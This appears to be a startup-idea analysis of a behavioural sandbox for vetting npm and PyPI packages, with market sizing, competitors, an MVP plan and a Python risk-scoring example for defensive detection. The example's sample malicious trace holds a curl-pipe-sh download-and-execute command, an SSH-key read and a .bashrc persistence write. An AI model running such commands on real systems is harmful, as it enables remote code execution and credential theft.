One commenter's company had to build a custom tool using Docker + tcpdump + Istio egress gateways to analyze package behavior — this is complex, bespoke infrastructure that every security-conscious org ends up rebuilding from scratch.
A SaaS or self-hosted service that automatically runs new/updated packages in instrumented sandbox containers, monitors network calls, filesystem access, and process spawning, then produces a trust score and detailed behavioral report. Integrates with CI/CD pipelines and artifact proxies to auto-approve or quarantine packages.
subscription — per-repository or per-scan pricing, with a free tier for open source projects
The pain signals are real — companies are literally building bespoke Docker+tcpdump+Istio solutions internally, which is expensive, fragile, and requires specialized expertise. The axios exploit comment ('it didn't block the recent axios exploit in time') shows that existing tools, which lean on vulnerability databases and static rules, are failing to catch malicious package versions before they reach developers. Every high-profile supply chain attack (SolarWinds, xz-utils, event-stream) reinforces urgency. Deducting 2 points because many orgs still treat this as 'nice to have' until they get hit, and the pain is concentrated in security-mature organizations.
TAM for supply chain security is $7-10B by 2028. The behavioral analysis sub-segment is perhaps 10-15% of that ($700M-1.5B). Serviceable market is security-conscious orgs (finance, healthcare, gov contractors) with 50+ developers — maybe 10,000-20,000 companies globally. At $30-100K/year average deal, that's a $300M-2B SAM. Strong enough for a venture-scale outcome but not as large as general SCA. Docking points because the buyer (security team) is a smaller budget center than engineering.
Security teams at regulated companies already spend $50K-500K+/year on SCA tools (Snyk, Sonatype). The companies building custom Docker+tcpdump solutions are spending far more in engineering time (2-3 senior engineers × months = $200K+ in labor). A $20-50K/year tool that replaces that custom infrastructure is an easy sell. However, this is a 'new category' sale — you're not replacing an existing line item, you're creating one. That's harder. Free tier for OSS creates bottom-up adoption but enterprise sales cycle will be 3-6 months.
This is the HARD part. A solo dev can build a basic sandbox that runs 'npm install' in a container and captures network traffic in 4-8 weeks — that's the MVP. BUT: (1) Scaling to millions of packages is compute-expensive, (2) anti-sandbox evasion is a real cat-and-mouse game, (3) distinguishing legitimate network calls (telemetry, update checks) from exfiltration requires sophisticated heuristics or ML, (4) covering multiple ecosystems (npm, pip, Maven, Go, RubyGems) multiplies complexity, (5) runtime analysis (not just install-time) requires instrumenting package imports which is language-specific and complex. The MVP is feasible; production-grade is a 6-12 month journey.
This is the strongest signal. Across ALL major competitors (Snyk, Socket, Sonatype, Endor Labs, JFrog Xray, Semgrep), NONE do runtime behavioral analysis. Only Phylum does install-time dynamic analysis, and even they don't monitor runtime behavior. The entire industry is stuck on static analysis and vulnerability database matching. The gap is real, well-defined, and validated by the fact that companies are building custom solutions. Socket's $65M raise and Phylum's existence prove the market values this direction — but nobody has nailed full behavioral analysis yet.
Natural subscription: packages update constantly, new packages are added weekly, threat landscape evolves daily. Per-repo or per-scan pricing scales with customer growth. Once integrated into CI/CD pipeline, switching costs are very high (security tooling is sticky — rip-and-replace is painful and risky). Continuous monitoring creates ongoing value. Self-hosted option for regulated industries adds enterprise tier pricing power. This is classic infrastructure SaaS with strong retention dynamics.
- +Clear, validated gap — no major competitor does full runtime behavioral analysis of packages
- +Strong market tailwinds — supply chain security spending growing 15-20% CAGR, driven by regulation (EO 14028, EU CRA) and real attacks
- +Pain is quantified — companies are spending $200K+ in engineering time building custom solutions with Docker+tcpdump+Istio
- +High switching costs and natural recurring revenue once embedded in CI/CD pipelines
- +Self-hosted option is a unique differentiator for regulated industries (finance, healthcare, gov) where data cannot leave the network
- +Complementary positioning possible — can sell alongside Snyk/Socket/Sonatype rather than competing head-on
- !TECHNICAL COMPLEXITY is the #1 risk — sandbox evasion, false positives from legitimate network calls, compute costs at scale, and multi-ecosystem coverage are genuinely hard problems
- !Phylum has a head start on dynamic analysis and could expand to full runtime monitoring before you gain traction
- !Socket ($65M funded) or Snyk ($7.4B valued) could add behavioral analysis as a feature, not a product — 'big company adds a checkbox' risk
- !Enterprise sales cycles in security are 3-6 months with POC requirements — long time to first revenue for a solo founder
- !Compute costs could be brutal — running every package version in a sandbox is expensive; unit economics need careful management
- !Sophisticated attackers already use anti-sandbox techniques (detecting virtualization, delayed payloads, environment checks) — arms race risk
Automated software supply chain risk analysis with partial dynamic analysis. Runs packages in sandboxes to monitor install-time behavior.
Deep package inspection via static analysis of source code before installation. Detects typosquatting, obfuscated code, install script abuse, and dependency confusion. Strong GitHub PR integration. Founded by Feross Aboukhadijeh
The OG of supply chain security. Repository firewall that sits between developers and public registries, blocking risky components via policy. Maintains OSS Index vulnerability database. Owns Maven Central.
Largest developer-focused security platform. SCA product scans dependencies against proprietary vulnerability database. Also offers SAST, container scanning, and IaC scanning. 2,500+ enterprise customers.
Dependency analysis focused on reachability — determines whether vulnerabilities in your dependencies actually affect your code via function-level call graph analysis. Reduces false positive alerts by ~80%.
- Week 1-2: Build a service that takes an npm package name+version, spins up an ephemeral Docker container, runs `npm install`, and captures all DNS queries, outbound TCP connections, file writes outside node_modules, and process spawns. strace (run with -f, since npm spawns child processes for lifecycle scripts) gives the file, exec and connect syscalls; tcpdump gives DNS queries and connection destinations. Caveat: tcpdump sees the destination and the TLS SNI of an HTTPS connection but not its payload, so an HTTPS call is judged by where it goes, not what it sends, unless you add a MITM proxy later.
- Week 3-4: Build a simple scoring algorithm (network calls to domains other than the registry = red flag, reads of or writes to ~/.ssh = red flag, a shell spawned with a curl-pipe-sh command = red flag, etc.) and a web dashboard showing the behavioral report.
- Week 5-6: Add a GitHub Action / CI integration that automatically scans new dependencies in PRs and comments with the trust score.
- Week 7-8: Add PyPI support and a Slack/webhook notification system.
- Ship with a free tier for public packages (pre-compute popular packages) and a waitlist for private repo scanning. DO NOT try to build runtime analysis (import-time monitoring) for the MVP: install-time behavioral analysis is enough to prove value and is roughly 10x simpler.
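The scoring step in weeks 3-4, and the feasibility caveat earlier on this page that a legitimate telemetry call is hard to tell apart from exfiltration, are easiest to see in code. The block below is an added example written for this page; it is not code from any product or from the commenters' internal tool. It assumes a collector has already reduced strace and tcpdump output to the simple event dicts constructed here. The event schema, the `/app` working directory, the allowlisted registry hosts, every weight and threshold, and the `.example` hostnames are all assumptions.

```python
import os
from dataclasses import dataclass, field

# Assumed allowlist: hosts an npm/pip install is expected to contact.
REGISTRY_HOSTS = {"registry.npmjs.org", "registry.yarnpkg.com", "pypi.org",
                  "files.pythonhosted.org", "github.com", "codeload.github.com"}
PROJECT_DIR = "/app"  # assumed working directory of the sandboxed install
WRITE_ALLOWED = (PROJECT_DIR + "/node_modules/", PROJECT_DIR + "/package-lock.json",
                 "/tmp/", "/root/.npm/", "/root/.cache/")
CREDENTIAL_MARKERS = ("/.ssh/", "/.aws/", "/.npmrc", "/.gnupg/", "/.git-credentials", "/etc/shadow")
PERSISTENCE_MARKERS = ("/.bashrc", "/.profile", "/.zshrc", "/etc/cron",
                       "/.ssh/authorized_keys", "/etc/ld.so.preload")
# Files a payload reads to decide whether it is inside a container or CI before detonating.
SANDBOX_PROBES = ("/.dockerenv", "/proc/1/cgroup", "/proc/self/cgroup", "/sys/class/dmi/id/")
SHELLS = {"sh", "bash", "dash", "zsh"}


@dataclass
class Report:
    risk: int = 0
    findings: list = field(default_factory=list)

    def add(self, points, msg):
        self.risk += points
        self.findings.append(f"+{points} {msg}")

    @property
    def trust_score(self):
        return max(0, 100 - self.risk)

    @property
    def verdict(self):  # thresholds are an assumption; tune against labelled packages
        if self.trust_score >= 80:
            return "allow"
        return "review" if self.trust_score >= 50 else "quarantine"


def score_events(events):
    """Additive risk points from collector events; trust score is 100 minus risk."""
    r, seen_dns = Report(), set()
    for ev in events:
        kind = ev["type"]
        if kind == "dns":
            name = ev["name"]
            if name not in REGISTRY_HOSTS and name not in seen_dns:
                seen_dns.add(name)
                r.add(5, f"DNS lookup of non-registry host {name}")
        elif kind == "connect":
            host, port = ev["host"], ev["port"]
            if host in REGISTRY_HOSTS:
                continue
            r.add(20, f"connection to non-registry host {host}:{port}")
            if port not in (80, 443):
                r.add(15, f"non-web port {port} (C2 or raw exfil channel)")
        elif kind == "open":
            path = ev["path"]
            if any(m in path for m in CREDENTIAL_MARKERS):
                r.add(30, f"read of credential material {path}")
            elif path.startswith(SANDBOX_PROBES):
                r.add(10, f"sandbox/CI probe {path} (possible evasion logic)")
        elif kind == "write":
            path = ev["path"]
            if any(m in path for m in PERSISTENCE_MARKERS):
                r.add(30, f"write to persistence location {path}")
            elif not path.startswith(WRITE_ALLOWED):
                r.add(10, f"write outside project/cache dirs {path}")
        elif kind == "exec":
            cmd = " ".join(ev["argv"])
            if os.path.basename(ev["argv"][0]) in SHELLS:
                r.add(10, f"shell spawned: {cmd}")
                if ("curl" in cmd or "wget" in cmd) and "|" in cmd:
                    r.add(25, "download-and-execute pipeline")
    return r


# Constructed sample traces, not real captures; .example hostnames are placeholders.
BENIGN = [
    {"type": "dns", "name": "registry.npmjs.org"},
    {"type": "connect", "host": "registry.npmjs.org", "port": 443},
    {"type": "write", "path": "/app/node_modules/left-pad/index.js"},
    {"type": "write", "path": "/app/package-lock.json"},
    {"type": "exec", "argv": ["/usr/bin/node", "scripts/postinstall.js"]},
]
TELEMETRY = BENIGN + [  # plausible usage ping: flagged for review, not blocked outright
    {"type": "dns", "name": "api.telemetry.example"},
    {"type": "connect", "host": "api.telemetry.example", "port": 443},
]
MALICIOUS = BENIGN + [
    {"type": "dns", "name": "a3f9c2.cdn-assets.example"},
    {"type": "connect", "host": "a3f9c2.cdn-assets.example", "port": 4444},
    {"type": "open", "path": "/root/.ssh/id_rsa"},
    {"type": "open", "path": "/.dockerenv"},
    {"type": "exec", "argv": ["/bin/sh", "-c", "curl -s http://203.0.113.7/p | sh"]},
    {"type": "write", "path": "/root/.bashrc"},
]

if __name__ == "__main__":
    for label, trace in (("benign", BENIGN), ("telemetry", TELEMETRY), ("malicious", MALICIOUS)):
        rep = score_events(trace)
        print(label, rep.trust_score, rep.verdict, *rep.findings, sep="\n  ")
```

Run directly, the three constructed traces score 100/allow, 75/review and 0/quarantine. The telemetry ping loses points for the non-registry connection but not enough to quarantine, which is exactly the ambiguity the feasibility section warns about: the heuristic can route it to a human, but it cannot tell a usage ping from low-volume exfiltration over port 443 without knowing the destination's reputation or seeing the payload. The malicious trace trips the credential read, the curl-pipe-sh spawn, the persistence write and the `/.dockerenv` probe that the risks list calls out as anti-sandbox behaviour; a payload that performs that probe and then stays quiet would score only 10, which is why the probe itself is worth flagging.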
Free: Behavioral reports for top 10K public npm/PyPI packages (pre-computed, searchable). Starter ($29/month): Scan any public package on-demand, 100 scans/month, GitHub Action integration. Team ($149/month): Private registry scanning, 1000 scans/month, Slack alerts, artifact proxy integration. Enterprise ($500-2000/month): Self-hosted deployment, unlimited scans, Nexus/Artifactory integration, custom policies, SSO/SAML, audit logs. Scale path: Once embedded in CI/CD, expand to container image behavioral analysis (run Docker images and monitor behavior) — adjacent $2B+ market.
8-12 weeks to MVP launch with free tier and waitlist. 3-4 months to first paying customer (likely a small/mid security team willing to pay $29-149/month). 6-9 months to first enterprise deal ($500+/month). The key accelerant is pre-computing behavioral reports for popular packages and making them freely searchable — this creates SEO traffic and bottom-up awareness (developers Google 'is package X safe' and find your report). First $1K MRR: ~4 months. First $10K MRR: ~8-12 months.
- “My company built a tool to review the package in a Docker container using tcpdump to determine if the package is trying to exfiltrate packages”
- “I have been tasked with setting up an Istio egress gateway to MITM and block egress”
- “it didn't block the recent axios exploit in time”